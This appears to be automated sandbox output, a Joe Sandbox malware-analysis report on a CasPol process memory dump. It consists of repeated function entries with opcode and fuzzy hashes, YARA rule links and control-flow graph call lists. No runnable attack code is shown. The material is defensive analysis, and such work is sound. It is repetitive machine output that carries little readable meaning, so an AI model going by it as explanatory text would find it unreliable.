                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a2a4b05a7f7d966d021e8ce6d85faf804db0daacfd27f472fb294d1e1a4840f8
                                                                                    • Instruction ID: 575145e284f999ef94aed58b6dde280f6c0fa74918d5ecab473e61c380ee57f3
                                                                                    • Opcode Fuzzy Hash: a2a4b05a7f7d966d021e8ce6d85faf804db0daacfd27f472fb294d1e1a4840f8
                                                                                    • Instruction Fuzzy Hash: 56A21574A04228CFCB65DF70C888B9DBBB6BB88305F1081EAD54AA3744DB359E85CF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01006EC9 Relevance: 2.1, APIs: 1, Instructions: 637libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ca8c96902e35488a765a23ec1ad731b46db3a10a8f15f2760a5af31fb6ee002a
                                                                                    • Instruction ID: f45705c89ea799d69ee2c4928ea236dbba3c81cf1c35cfaa1c929d95cf0ea316
                                                                                    • Opcode Fuzzy Hash: ca8c96902e35488a765a23ec1ad731b46db3a10a8f15f2760a5af31fb6ee002a
                                                                                    • Instruction Fuzzy Hash: 67621674A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01006F0E Relevance: 2.1, APIs: 1, Instructions: 628libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e5e729943f07bd4f1480c9bbd64d441604d1ae727372566afa73753eec369ce2
                                                                                    • Instruction ID: e40dfd8952f116fa67d12d83c40085d47e5b5e6653cb8f6572bf2144da573e10
                                                                                    • Opcode Fuzzy Hash: e5e729943f07bd4f1480c9bbd64d441604d1ae727372566afa73753eec369ce2
                                                                                    • Instruction Fuzzy Hash: CF621674A04228CFCB65DF70C888B9DB7B6BF88205F6081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01006F60 Relevance: 2.1, APIs: 1, Instructions: 619libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 3491411453275c790fd904a04922aa2d8aeed5da7e3e916e72c5659cd2e4e605
                                                                                    • Instruction ID: f8918ac1d04838fe9841b2ea5e5970492a37fee2349729f721dd1a45fcdfcbe2
                                                                                    • Opcode Fuzzy Hash: 3491411453275c790fd904a04922aa2d8aeed5da7e3e916e72c5659cd2e4e605
                                                                                    • Instruction Fuzzy Hash: F2521774A04228CFCB65DF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01006FA5 Relevance: 2.1, APIs: 1, Instructions: 612libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a5f3489364a4b2848fe9e14001920fc552fef3c3a21e69f7626707d5b8b80b75
                                                                                    • Instruction ID: 48c214fe73cf44c688b9899f83bdcc3fa415a3e9832153a9bc20cb8c02bd13a9
                                                                                    • Opcode Fuzzy Hash: a5f3489364a4b2848fe9e14001920fc552fef3c3a21e69f7626707d5b8b80b75
                                                                                    • Instruction Fuzzy Hash: 1D522774A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01006FEA Relevance: 2.1, APIs: 1, Instructions: 605libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 75c646722db4c2613677d1eb66188abe6c29722e63be20b9d1168b120caae0f8
                                                                                    • Instruction ID: f83e450f700d583ee66690b21f7ce8617ef0f04ee93602ef8f37c0590ca3f2e7
                                                                                    • Opcode Fuzzy Hash: 75c646722db4c2613677d1eb66188abe6c29722e63be20b9d1168b120caae0f8
                                                                                    • Instruction Fuzzy Hash: BE522774A04228CFCB65DF70C888B9DB7B6BF88205F6081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0100702F Relevance: 2.1, APIs: 1, Instructions: 598libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 00390a556965a94cdb58a278f5656a08ed060de76cdbb9c94dad5d35716fbe78
                                                                                    • Instruction ID: dee3ce86b8f17e0d276cbf67b471a28f384fc7e9229eb708e8fc8d46ab851f29
                                                                                    • Opcode Fuzzy Hash: 00390a556965a94cdb58a278f5656a08ed060de76cdbb9c94dad5d35716fbe78
                                                                                    • Instruction Fuzzy Hash: 39522774A04228CFCB65DF70C888B9DB7B6BF88205F6081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007074 Relevance: 2.1, APIs: 1, Instructions: 591libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: f1092fd2f392ea3de868701c28e3b84fe96816a5552bcf519dfb60cb2c153649
                                                                                    • Instruction ID: 00c5340c0da59eb678ade323d4fd205c1d3439aec0d08b0233d35638269def0d
                                                                                    • Opcode Fuzzy Hash: f1092fd2f392ea3de868701c28e3b84fe96816a5552bcf519dfb60cb2c153649
                                                                                    • Instruction Fuzzy Hash: D4522774A04228CFCB65DF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010070B9 Relevance: 2.1, APIs: 1, Instructions: 584libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 544ea028455995630384fee90f20ca6a6df579b43a0579e363ec153c74d50365
                                                                                    • Instruction ID: 34b813829a355f26310a59b2488481b2e6d0b5ae4d6da065fd7e5ed19db5ce43
                                                                                    • Opcode Fuzzy Hash: 544ea028455995630384fee90f20ca6a6df579b43a0579e363ec153c74d50365
                                                                                    • Instruction Fuzzy Hash: D8522774A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010070FE Relevance: 2.1, APIs: 1, Instructions: 577libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 4061491f7506aa10eed0e4702abbd4600c8c10d053a903ecc70c463b5ea04b49
                                                                                    • Instruction ID: 4ef3b50e7de808089eb0250cbfe008376b34420f71ebb9f13d952610052d08de
                                                                                    • Opcode Fuzzy Hash: 4061491f7506aa10eed0e4702abbd4600c8c10d053a903ecc70c463b5ea04b49
                                                                                    • Instruction Fuzzy Hash: D6522774A04228CFCB65DF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007143 Relevance: 2.1, APIs: 1, Instructions: 570libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ca7026383dcfb08ea46291daf03a1f89aefe9c5a271a2ee6b986130eabe3f265
                                                                                    • Instruction ID: 421f42f50cb72914ea6604826f73324ee6b9ebe6ee2aa939b1cae0b831132c9d
                                                                                    • Opcode Fuzzy Hash: ca7026383dcfb08ea46291daf03a1f89aefe9c5a271a2ee6b986130eabe3f265
                                                                                    • Instruction Fuzzy Hash: B9422774A04228CFCB65DF70C888B9DB7B6BF88205F6081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007188 Relevance: 2.1, APIs: 1, Instructions: 561libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b2e2a9469bc61a9879cc47f6f346db0dea95c90844f0a1ca730aaaff81ac031a
                                                                                    • Instruction ID: b556c53250d69126f48e8ee34ebbf07d9578071da2c75345a295dca02aae874f
                                                                                    • Opcode Fuzzy Hash: b2e2a9469bc61a9879cc47f6f346db0dea95c90844f0a1ca730aaaff81ac031a
                                                                                    • Instruction Fuzzy Hash: 75422874A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010071C4 Relevance: 2.1, APIs: 1, Instructions: 556libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: ccd7725a593604388486202e04b6b3047c9951bcc76a799e9d0f3e43011b5a1d
                                                                                    • Instruction ID: 451234f91b4e2043c672856a3ed2e1e1dffabf3f44b7fb829c5f800b400e7505
                                                                                    • Opcode Fuzzy Hash: ccd7725a593604388486202e04b6b3047c9951bcc76a799e9d0f3e43011b5a1d
                                                                                    • Instruction Fuzzy Hash: B6421774A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007209 Relevance: 2.0, APIs: 1, Instructions: 549libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: bdb01592e38a892d5f7ab4d9a73ce86af0043f2d0a08e1c5bb52f739ac6d0f43
                                                                                    • Instruction ID: 0ad4b8732d21fd35033532bbdd3766e5ecc17ef3860f9592bdeaa2cae1933339
                                                                                    • Opcode Fuzzy Hash: bdb01592e38a892d5f7ab4d9a73ce86af0043f2d0a08e1c5bb52f739ac6d0f43
                                                                                    • Instruction Fuzzy Hash: B3421774A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0100724E Relevance: 2.0, APIs: 1, Instructions: 542libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 8553 100724e-1007272 call 1006288 call 1006418 8911 1007272 call 15692c7 8553->8911 8912 1007272 call 1569268 8553->8912 8913 1007272 call 1569219 8553->8913 8559 1007278-10072fc 8915 10072fc call 15697d8 8559->8915 8916 10072fc call 1569838 8559->8916 8565 1007302-1007407 8928 1007407 call 156aa58 8565->8928 8929 1007407 call 156a9f9 8565->8929 8577 100740d-1007462 8930 1007462 call 156ac37 8577->8930 8931 1007462 call 156ad47 8577->8931 8932 1007462 call 156ace8 8577->8932 8581 1007468-1007528 8937 1007528 call 156b6a5 8581->8937 8938 1007528 call 156b140 8581->8938 8939 1007528 call 156b0e0 8581->8939 8940 1007528 call 156b651 8581->8940 8941 1007528 call 156b358 8581->8941 8590 100752e-1007564 8942 1007564 call 1c7710f7 8590->8942 8943 1007564 call 1c7715b3 8590->8943 8944 1007564 call 1c771bcf 8590->8944 8945 1007564 call 1c771108 8590->8945 8593 100756a-10075e5 8881 10075e5 call 1c771e27 8593->8881 8882 10075e5 call 1c771d68 8593->8882 8883 10075e5 call 1c771dc8 8593->8883 8599 10075eb-100762a 8884 100762a call 1c771f47 8599->8884 8885 100762a call 1c771e8a 8599->8885 8886 100762a call 1c771ee8 8599->8886 8602 1007630-10076ba 8891 10076ba call 1c772450 8602->8891 8892 10076ba call 1c7723b0 8602->8892 8893 10076ba call 1c7724af 8602->8893 8608 10076c0-1007702 8894 1007702 call 1c772570 8608->8894 8895 1007702 call 1c772510 8608->8895 8611 1007708-1007781 8899 1007787 call 1c7734c1 8611->8899 8900 1007787 call 1c773660 8611->8900 8901 1007787 call 1c7734bf 8611->8901 8902 1007787 call 1c7736dd 8611->8902 8903 1007787 call 1c773568 8611->8903 8618 100778d-10078db call 1c7737a8 * 5 LdrInitializeThunk 8639 10078e1-1007905 8618->8639 8640 1007c02 8618->8640 8646 100790b 8639->8646 8647 1007a5e-1007a82 8639->8647 8918 1007c02 call 1c773cc9 8640->8918 8919 1007c02 call 1c773cd8 8640->8919 8920 1007c02 call 1c773dc8 8640->8920 8641 1007c08-1007c92 8933 1007c92 call 1c7745e0 8641->8933 8934 1007c92 call 1c774580 8641->8934 8646->8647 8648 1007911-1007a59 8646->8648 8654 1007a84 8647->8654 8655 1007a88-1007a8a 8647->8655 8648->8640 8658 1007a86 8654->8658 8659 1007a8c 8654->8659 8660 1007a91-1007abb 8655->8660 8658->8655 8659->8660 8669 1007ac1-1007ac3 8660->8669 8670 1007abd 8660->8670 8662 1007c98-1007cda 8876 1007cda call 1c7749fa 8662->8876 8877 1007cda call 1c774a08 8662->8877 8673 1007aca-1007ad0 8669->8673 8671 1007ac5 8670->8671 8672 1007abf 8670->8672 8671->8673 8672->8669 8673->8640 8675 1007ad6-1007bd9 8673->8675 8674 1007ce0-1007d22 8887 1007d22 call 1c774f27 8674->8887 8888 1007d22 call 1c7749fa 8674->8888 8889 1007d22 call 1c774e28 8674->8889 8890 1007d22 call 1c774a08 8674->8890 8675->8640 8681 1007d28-1007d6a 8896 1007d6a call 1c775047 8681->8896 8897 1007d6a call 1c774fe8 8681->8897 8898 1007d6a call 1c774f88 8681->8898 8690 1007d70-1007db2 8904 1007db2 call 1c7750a8 8690->8904 8905 1007db2 call 1c775108 8690->8905 8698 1007db8-1007e8a 8923 1007e8a call 1c776507 8698->8923 8924 1007e8a call 1c776096 8698->8924 8925 1007e8a call 1c7760a0 8698->8925 8926 1007e8a call 1c7763a9 8698->8926 8927 1007e8a call 1c7761e8 8698->8927 8722 1007e90-1007f1a 8935 1007f1a call 1c7768a0 8722->8935 8936 1007f1a call 1c776890 8722->8936 8737 1007f20-1007fe6 8878 1007fe6 call 1c778c47 8737->8878 8879 1007fe6 call 1c778ce7 8737->8879 8880 1007fe6 call 1c778c50 8737->8880 8746 1007fec-1008038 8749 1008331-1008342 8746->8749 8750 100803e-1008061 8746->8750 8753 1008348-100834f 8749->8753 8754 100869c-10086a3 8749->8754 8762 1008067-10080d9 8750->8762 8763 1008319-100832e 8750->8763 8757 1008355-1008363 8753->8757 8758 10083e6-10083ed 8753->8758 8755 1008725-1008740 8754->8755 8756 10086a9-100871a 8754->8756 8756->8755 8908 1008369 call 1c77a6f0 8757->8908 8909 1008369 call 1c77a700 8757->8909 8760 10083f3-1008538 call 1005aa8 call 10056b0 8758->8760 8761 100855d-1008564 8758->8761 8760->8754 8761->8754 8764 100856a-100867f call 1005aa8 call 10056b0 call 10056f8 8761->8764 8789 1008301-1008313 8762->8789 8790 10080df-10080e6 8762->8790 8771 100832f 8763->8771 8764->8754 8771->8771 8779 100836f-10083a9 8921 10083af call 1c77b9c0 8779->8921 8922 10083af call 1c77b91f 8779->8922 8789->8762 8789->8763 8794 10080ec-10081fa 8790->8794 8795 10081ff-100822a 8790->8795 8794->8789 8795->8789 8800 1008230-10082d8 8795->8800 8799 10083b5 8799->8754 8800->8789 8876->8674 8877->8674 8878->8746 8879->8746 8880->8746 8881->8599 8882->8599 8883->8599 8884->8602 8885->8602 8886->8602 8887->8681 8888->8681 8889->8681 8890->8681 8891->8608 8892->8608 8893->8608 8894->8611 8895->8611 8896->8690 8897->8690 8898->8690 8899->8618 8900->8618 8901->8618 8902->8618 8903->8618 8904->8698 8905->8698 8908->8779 8909->8779 8911->8559 8912->8559 8913->8559 8915->8565 8916->8565 8918->8641 8919->8641 8920->8641 8921->8799 8922->8799 8923->8722 8924->8722 8925->8722 8926->8722 8927->8722 8928->8577 8929->8577 8930->8581 8931->8581 8932->8581 8933->8662 8934->8662 8935->8737 8936->8737 8937->8590 8938->8590 8939->8590 8940->8590 8941->8590 8942->8593 8943->8593 8944->8593 8945->8593
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b0fb23976d5b46727d855372fe71a4f09c20650d962d7ece90898bb0a87adffc
                                                                                    • Instruction ID: 6b4d72677fb93f0506d3e25ebcb5d275caab694bd3115ed091ca312f3a979274
                                                                                    • Opcode Fuzzy Hash: b0fb23976d5b46727d855372fe71a4f09c20650d962d7ece90898bb0a87adffc
                                                                                    • Instruction Fuzzy Hash: B9422874A04228CFCB65DF70C888B9DB7B6BF88205F6081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007293 Relevance: 2.0, APIs: 1, Instructions: 535libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 8946 1007293-10072fc call 1006288 call 1006418 9324 10072fc call 15697d8 8946->9324 9325 10072fc call 1569838 8946->9325 8955 1007302-1007407 9281 1007407 call 156aa58 8955->9281 9282 1007407 call 156a9f9 8955->9282 8967 100740d-1007462 9288 1007462 call 156ac37 8967->9288 9289 1007462 call 156ad47 8967->9289 9290 1007462 call 156ace8 8967->9290 8971 1007468-1007528 9296 1007528 call 156b6a5 8971->9296 9297 1007528 call 156b140 8971->9297 9298 1007528 call 156b0e0 8971->9298 9299 1007528 call 156b651 8971->9299 9300 1007528 call 156b358 8971->9300 8980 100752e-1007564 9302 1007564 call 1c7710f7 8980->9302 9303 1007564 call 1c7715b3 8980->9303 9304 1007564 call 1c771bcf 8980->9304 9305 1007564 call 1c771108 8980->9305 8983 100756a-10075e5 9314 10075e5 call 1c771e27 8983->9314 9315 10075e5 call 1c771d68 8983->9315 9316 10075e5 call 1c771dc8 8983->9316 8989 10075eb-100762a 9317 100762a call 1c771f47 8989->9317 9318 100762a call 1c771e8a 8989->9318 9319 100762a call 1c771ee8 8989->9319 8992 1007630-10076ba 9268 10076ba call 1c772450 8992->9268 9269 10076ba call 1c7723b0 8992->9269 9270 10076ba call 1c7724af 8992->9270 8998 10076c0-1007702 9271 1007702 call 1c772570 8998->9271 9272 1007702 call 1c772510 8998->9272 9001 1007708-1007781 9283 1007787 call 1c7734c1 9001->9283 9284 1007787 call 1c773660 9001->9284 9285 1007787 call 1c7734bf 9001->9285 9286 1007787 call 1c7736dd 9001->9286 9287 1007787 call 1c773568 9001->9287 9008 100778d-10078db call 1c7737a8 * 5 LdrInitializeThunk 9029 10078e1-1007905 9008->9029 9030 1007c02 9008->9030 9036 100790b 9029->9036 9037 1007a5e-1007a82 9029->9037 9326 1007c02 call 1c773cc9 9030->9326 9327 1007c02 call 1c773cd8 9030->9327 9328 1007c02 call 1c773dc8 9030->9328 9031 1007c08-1007c92 9294 1007c92 call 1c7745e0 9031->9294 9295 1007c92 call 1c774580 9031->9295 9036->9037 9038 1007911-1007a59 9036->9038 9044 1007a84 9037->9044 9045 1007a88-1007a8a 9037->9045 9038->9030 9048 1007a86 9044->9048 9049 1007a8c 9044->9049 9050 1007a91-1007abb 9045->9050 9048->9045 9049->9050 9059 1007ac1-1007ac3 9050->9059 9060 1007abd 9050->9060 9052 1007c98-1007cda 9311 1007cda call 1c7749fa 9052->9311 9312 1007cda call 1c774a08 9052->9312 9063 1007aca-1007ad0 9059->9063 9061 1007ac5 9060->9061 9062 1007abf 9060->9062 9061->9063 9062->9059 9063->9030 9065 1007ad6-1007bd9 9063->9065 9064 1007ce0-1007d22 9329 1007d22 call 1c774f27 9064->9329 9330 1007d22 call 1c7749fa 9064->9330 9331 1007d22 call 1c774e28 9064->9331 9332 1007d22 call 1c774a08 9064->9332 9065->9030 9071 1007d28-1007d6a 9273 1007d6a call 1c775047 9071->9273 9274 1007d6a call 1c774fe8 9071->9274 9275 1007d6a call 1c774f88 9071->9275 9080 1007d70-1007db2 9292 1007db2 call 1c7750a8 9080->9292 9293 1007db2 call 1c775108 9080->9293 9088 1007db8-1007e8a 9276 1007e8a call 1c776507 9088->9276 9277 1007e8a call 1c776096 9088->9277 9278 1007e8a call 1c7760a0 9088->9278 9279 1007e8a call 1c7763a9 9088->9279 9280 1007e8a call 1c7761e8 9088->9280 9112 1007e90-1007f1a 9306 1007f1a call 1c7768a0 9112->9306 9307 1007f1a call 1c776890 9112->9307 9127 1007f20-1007fe6 9320 1007fe6 call 1c778c47 9127->9320 9321 1007fe6 call 1c778ce7 9127->9321 9322 1007fe6 call 1c778c50 9127->9322 9136 1007fec-1008038 9139 1008331-1008342 9136->9139 9140 100803e-1008061 9136->9140 9143 1008348-100834f 9139->9143 9144 100869c-10086a3 9139->9144 9152 1008067-10080d9 9140->9152 9153 1008319-100832e 9140->9153 9147 1008355-1008363 9143->9147 9148 10083e6-10083ed 9143->9148 9145 1008725-1008740 9144->9145 9146 10086a9-100871a 9144->9146 9146->9145 9308 1008369 call 1c77a6f0 9147->9308 9309 1008369 call 1c77a700 9147->9309 9150 10083f3-1008538 call 1005aa8 call 10056b0 9148->9150 9151 100855d-1008564 9148->9151 9150->9144 9151->9144 9154 100856a-100867f call 1005aa8 call 10056b0 call 10056f8 9151->9154 9179 1008301-1008313 9152->9179 9180 10080df-10080e6 9152->9180 9161 100832f 9153->9161 9154->9144 9161->9161 9169 100836f-10083a9 9266 10083af call 1c77b9c0 9169->9266 9267 10083af call 1c77b91f 9169->9267 9179->9152 9179->9153 9184 10080ec-10081fa 9180->9184 9185 10081ff-100822a 9180->9185 9184->9179 9185->9179 9190 1008230-10082d8 9185->9190 9189 10083b5 9189->9144 9190->9179 9266->9189 9267->9189 9268->8998 9269->8998 9270->8998 9271->9001 9272->9001 9273->9080 9274->9080 9275->9080 9276->9112 9277->9112 9278->9112 9279->9112 9280->9112 9281->8967 9282->8967 9283->9008 9284->9008 9285->9008 9286->9008 9287->9008 9288->8971 9289->8971 9290->8971 9292->9088 9293->9088 9294->9052 9295->9052 9296->8980 9297->8980 9298->8980 9299->8980 9300->8980 9302->8983 9303->8983 9304->8983 9305->8983 9306->9127 9307->9127 9308->9169 9309->9169 9311->9064 9312->9064 9314->8989 9315->8989 9316->8989 9317->8992 9318->8992 9319->8992 9320->9136 9321->9136 9322->9136 9324->8955 9325->8955 9326->9031 9327->9031 9328->9031 9329->9071 9330->9071 9331->9071 9332->9071
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 7a0c82302138063131534f0d4620d3eb04b3eb51f368e10dcdf875e03a3e8c73
                                                                                    • Instruction ID: 966b31b6478b1ba1cb37a4c6161ca664cf7175ab23000b250428a841fdd5790f
                                                                                    • Opcode Fuzzy Hash: 7a0c82302138063131534f0d4620d3eb04b3eb51f368e10dcdf875e03a3e8c73
                                                                                    • Instruction Fuzzy Hash: 10422874A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 010072D8 Relevance: 2.0, APIs: 1, Instructions: 528libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
